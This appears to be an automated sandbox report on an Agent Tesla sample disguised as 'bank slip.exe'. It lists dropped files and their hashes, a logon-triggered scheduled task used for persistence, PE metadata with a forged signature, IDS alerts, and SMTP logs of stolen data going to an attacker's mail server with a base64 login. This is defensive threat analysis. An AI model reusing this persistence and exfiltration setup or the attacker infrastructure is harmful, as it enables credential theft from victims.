                                                                    SHA-512:2B515628A5CA741AEE2C969C7D3A454A274E45A692E384CD9073CC47761BB8F73CB3DB247AA90B94692FDA0F152905F769A41690CDA382E315E61ADB8AFACE4E
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                    C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:modified
                                                                    Size (bytes):45984
                                                                    Entropy (8bit):6.16795797263964
                                                                    Encrypted:false
                                                                    SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                    MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                    SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                    SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                    SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: PAYMENT LIST.exe, Detection: malicious, Browse
                                                                    • Filename: E7236252-receipt.vbs, Detection: malicious, Browse
                                                                    • Filename: I7336446-receipt.vbs, Detection: malicious, Browse
                                                                    • Filename: S94847456-receipt.vbs, Detection: malicious, Browse
                                                                    • Filename: Transfer copy PDF.exe, Detection: malicious, Browse
                                                                    • Filename: PO# CV-PO23002552.PDF.exe, Detection: malicious, Browse
                                                                    • Filename: Deposit payment copy PDF.exe, Detection: malicious, Browse
                                                                    • Filename: Approved E-DO PDF.exe, Detection: malicious, Browse
                                                                    • Filename: PO# CV-PO23002552.exe, Detection: malicious, Browse
                                                                    • Filename: Invoice Checklist.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                                    C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\bank slip.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):745480
                                                                    Entropy (8bit):7.957107975771517
                                                                    Encrypted:false
                                                                    SSDEEP:12288:ioI4iAEfDVx9LPomIdTycMhJJM8MQwWQNCPLtDNNmr7cDn6SLlcP9C3cc081kR:y4RE7VxlPom8TyJPJM8dw4xDjl6ucP9Z
                                                                    MD5:64FF7F01E8A040DD0708D0D3C72A09F7
                                                                    SHA1:71D66159D1414876A6AE19696A5A3D99FC5DF6A6
                                                                    SHA-256:0EB53728ACB5E4B7C857ED35DACC4BA1264249CADA90F5E69D3FDE4E9B243190
                                                                    SHA-512:AD136FF713D93ABAAB512BAB4695F2181568FA9A994F398A946985ECBADFA3A46B07790B648AB47B68BACA27EDE294E4049C8E523D8507D7E334BC3261C21D1C
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 24%
                                                                    • Antivirus: Virustotal, Detection: 38%, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:[8f..............0......@........... ... ....@.. ....................................@.....................................O.... ..X=...........*...6...`..........T............................................ ............... ..H............text...H.... ...................... ..`.rsrc...X=... ...>..................@..@.reloc.......`.......(..............@..B........................H........m...T..........t...X!.........................................."..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*..(......(......(......(......(....*..(......(......(......(......(....*>..o.....X(....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*..{....*"..}....*..0..X........(....}.....(......(......(......(......o......o......o.....r...p(......o.........}....*.0..9.........{.....(.....(.....

                                                                    C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\bank slip.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    \Device\ConDrv

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1141
                                                                    Entropy (8bit):4.442398121585593
                                                                    Encrypted:false
                                                                    SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                                    MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                                    SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                                    SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                                    SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                                    Malicious:false
                                                                    Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.957107975771517
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:bank slip.exe
                                                                    File size:745'480 bytes
                                                                    MD5:64ff7f01e8a040dd0708d0d3c72a09f7
                                                                    SHA1:71d66159d1414876a6ae19696a5a3d99fc5df6a6
                                                                    SHA256:0eb53728acb5e4b7c857ed35dacc4ba1264249cada90f5e69d3fde4e9b243190
                                                                    SHA512:ad136ff713d93abaab512bab4695f2181568fa9a994f398a946985ecbadfa3a46b07790b648ab47b68baca27ede294e4049c8e523d8507d7e334bc3261c21d1c
                                                                    SSDEEP:12288:ioI4iAEfDVx9LPomIdTycMhJJM8MQwWQNCPLtDNNmr7cDn6SLlcP9C3cc081kR:y4RE7VxlPom8TyJPJM8dw4xDjl6ucP9Z
                                                                    TLSH:B6F42383368EC703C67D84B85151924007B166C67F51D298BCEAB0FBAA9FFD28345AD7
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:[8f..............0......@........... ... ....@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:f8bcd76926924906

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4b061a
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x66385B3A [Mon May 6 04:23:22 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Authenticode Signature

                                                                    Signature Valid:false
                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                    Error Number:-2146869232
                                                                    Not Before, Not After
                                                                    • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                    Subject Chain
                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                    Version:3
                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    inc ebx
                                                                    push edi
                                                                    xor al, 50h
                                                                    inc ebx
                                                                    pop edx
                                                                    dec ebx
                                                                    dec eax
                                                                    inc edx
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [edi+38h], al
                                                                    dec eax
                                                                    pop edx
                                                                    inc edi
                                                                    xor al, 42h
                                                                    dec edx
                                                                    cmp byte ptr [ebx+00h], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [ebx+48h], al
                                                                    aaa
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb05c80x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x3d58.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xb2a000x3608
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xae3cc0x54.text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000xae6480xae800071f91665e1206f31fbc43ca75165ac3False0.9572634983882522data7.962545979931204IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0xb20000x3d580x3e00eef5ea739c98051791bab805da2745d9False0.9456275201612904data7.812640516769869IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xb60000xc0x200bd8718fa8ed6bf3c8cb049985e8de5e5False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xb21000x373aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0007780449851464
                                                                    RT_GROUP_ICON0xb584c0x14data1.05
                                                                    RT_VERSION0xb58700x2e8data0.4637096774193548
                                                                    RT_MANIFEST0xb5b680x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    05/06/24-08:13:10.302990TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49712587192.168.2.5111.118.215.27
                                                                    05/06/24-08:12:59.940556TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49710587192.168.2.5111.118.215.27
                                                                    05/06/24-08:12:59.940511TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49710587192.168.2.5111.118.215.27
                                                                    05/06/24-08:13:10.303039TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49712587192.168.2.5111.118.215.27
                                                                    05/06/24-08:13:10.303039TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49712587192.168.2.5111.118.215.27
                                                                    05/06/24-08:13:10.303039TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49712587192.168.2.5111.118.215.27
                                                                    05/06/24-08:13:10.303039TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249712587192.168.2.5111.118.215.27
                                                                    05/06/24-08:12:59.940511TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49710587192.168.2.5111.118.215.27
                                                                    05/06/24-08:12:59.940556TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249710587192.168.2.5111.118.215.27
                                                                    05/06/24-08:12:59.940556TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49710587192.168.2.5111.118.215.27
                                                                    05/06/24-08:12:59.940556TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49710587192.168.2.5111.118.215.27
                                                                    05/06/24-08:13:10.302990TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49712587192.168.2.5111.118.215.27

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    May 6, 2024 08:12:56.205461025 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:12:56.529448032 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:56.530762911 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:12:57.302267075 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:57.380064964 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:12:57.704293966 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:57.716609955 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:12:58.040970087 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:58.042079926 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:12:58.406256914 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:58.901988983 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:58.908174992 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:12:59.232139111 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:59.232198000 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:59.232470989 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:12:59.597167969 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:59.614502907 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:59.614799023 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:12:59.938651085 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:59.939052105 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:12:59.940510988 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:12:59.940556049 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:12:59.940577030 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:12:59.940592051 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:00.264338970 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:00.264421940 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:00.265676022 CEST58749710111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:00.323122978 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:02.714610100 CEST49710587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:03.772931099 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:04.100557089 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:04.100651979 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:05.576138020 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:05.714042902 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:08.161076069 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:08.488931894 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:08.562442064 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:08.890682936 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:08.905874968 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:09.234807014 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:09.262145042 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:09.590131998 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:09.590356112 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:09.959328890 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:09.973557949 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:09.974714041 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:10.302071095 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:10.302313089 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:10.302989960 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:10.303039074 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:10.303065062 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:10.303075075 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:13:10.630368948 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:10.632023096 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:13:10.714117050 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:14:43.776997089 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:14:44.145536900 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:14:44.306164026 CEST58749712111.118.215.27192.168.2.5
                                                                    May 6, 2024 08:14:44.306956053 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:14:44.307086945 CEST49712587192.168.2.5111.118.215.27
                                                                    May 6, 2024 08:14:44.634711981 CEST58749712111.118.215.27192.168.2.5

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    May 6, 2024 08:12:55.142153978 CEST6034053192.168.2.51.1.1.1
                                                                    May 6, 2024 08:12:56.060425043 CEST53603401.1.1.1192.168.2.5

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    May 6, 2024 08:12:55.142153978 CEST192.168.2.51.1.1.10xd9c6Standard query (0)mail.vw-rmplcars.co.inA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    May 6, 2024 08:12:56.060425043 CEST1.1.1.1192.168.2.50xd9c6No error (0)mail.vw-rmplcars.co.invw-rmplcars.co.inCNAME (Canonical name)IN (0x0001)false
                                                                    May 6, 2024 08:12:56.060425043 CEST1.1.1.1192.168.2.50xd9c6No error (0)vw-rmplcars.co.in111.118.215.27A (IP address)IN (0x0001)false

                                                                    SMTP Packets

                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                    May 6, 2024 08:12:57.302267075 CEST58749710111.118.215.27192.168.2.5220-bh-in-12.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 06 May 2024 11:42:57 +0530
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                    May 6, 2024 08:12:57.380064964 CEST49710587192.168.2.5111.118.215.27EHLO 138727
                                                                    May 6, 2024 08:12:57.704293966 CEST58749710111.118.215.27192.168.2.5250-bh-in-12.webhostbox.net Hello 138727 [84.17.40.101]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-PIPECONNECT
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-STARTTLS
                                                                    250 HELP
                                                                    May 6, 2024 08:12:57.716609955 CEST49710587192.168.2.5111.118.215.27AUTH login YWNjb3VudC5zd0B2dy1ybXBsY2Fycy5jby5pbg==
                                                                    May 6, 2024 08:12:58.040970087 CEST58749710111.118.215.27192.168.2.5334 UGFzc3dvcmQ6
                                                                    May 6, 2024 08:12:58.901988983 CEST58749710111.118.215.27192.168.2.5235 Authentication succeeded
                                                                    May 6, 2024 08:12:58.908174992 CEST49710587192.168.2.5111.118.215.27MAIL FROM:<account.sw@vw-rmplcars.co.in>
                                                                    May 6, 2024 08:12:59.232198000 CEST58749710111.118.215.27192.168.2.5250 OK
                                                                    May 6, 2024 08:12:59.232470989 CEST49710587192.168.2.5111.118.215.27RCPT TO:<express.store1@expressstore-ks.com>
                                                                    May 6, 2024 08:12:59.614502907 CEST58749710111.118.215.27192.168.2.5250 Accepted
                                                                    May 6, 2024 08:12:59.614799023 CEST49710587192.168.2.5111.118.215.27DATA
                                                                    May 6, 2024 08:12:59.939052105 CEST58749710111.118.215.27192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                    May 6, 2024 08:12:59.940592051 CEST49710587192.168.2.5111.118.215.27.
                                                                    May 6, 2024 08:13:00.265676022 CEST58749710111.118.215.27192.168.2.5250 OK id=1s3rat-003Aqx-2U
                                                                    May 6, 2024 08:13:05.576138020 CEST58749712111.118.215.27192.168.2.5220-bh-in-12.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 06 May 2024 11:43:05 +0530
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                    May 6, 2024 08:13:08.161076069 CEST49712587192.168.2.5111.118.215.27EHLO 138727
                                                                    May 6, 2024 08:13:08.488931894 CEST58749712111.118.215.27192.168.2.5250-bh-in-12.webhostbox.net Hello 138727 [84.17.40.101]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-PIPECONNECT
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-STARTTLS
                                                                    250 HELP
                                                                    May 6, 2024 08:13:08.562442064 CEST49712587192.168.2.5111.118.215.27AUTH login YWNjb3VudC5zd0B2dy1ybXBsY2Fycy5jby5pbg==
                                                                    May 6, 2024 08:13:08.890682936 CEST58749712111.118.215.27192.168.2.5334 UGFzc3dvcmQ6
                                                                    May 6, 2024 08:13:09.234807014 CEST58749712111.118.215.27192.168.2.5235 Authentication succeeded
                                                                    May 6, 2024 08:13:09.262145042 CEST49712587192.168.2.5111.118.215.27MAIL FROM:<account.sw@vw-rmplcars.co.in>
                                                                    May 6, 2024 08:13:09.590131998 CEST58749712111.118.215.27192.168.2.5250 OK
                                                                    May 6, 2024 08:13:09.590356112 CEST49712587192.168.2.5111.118.215.27RCPT TO:<express.store1@expressstore-ks.com>
                                                                    May 6, 2024 08:13:09.973557949 CEST58749712111.118.215.27192.168.2.5250 Accepted
                                                                    May 6, 2024 08:13:09.974714041 CEST49712587192.168.2.5111.118.215.27DATA
                                                                    May 6, 2024 08:13:10.302313089 CEST58749712111.118.215.27192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                    May 6, 2024 08:13:10.303075075 CEST49712587192.168.2.5111.118.215.27.
                                                                    May 6, 2024 08:13:10.632023096 CEST58749712111.118.215.27192.168.2.5250 OK id=1s3rb4-003B0r-0Q
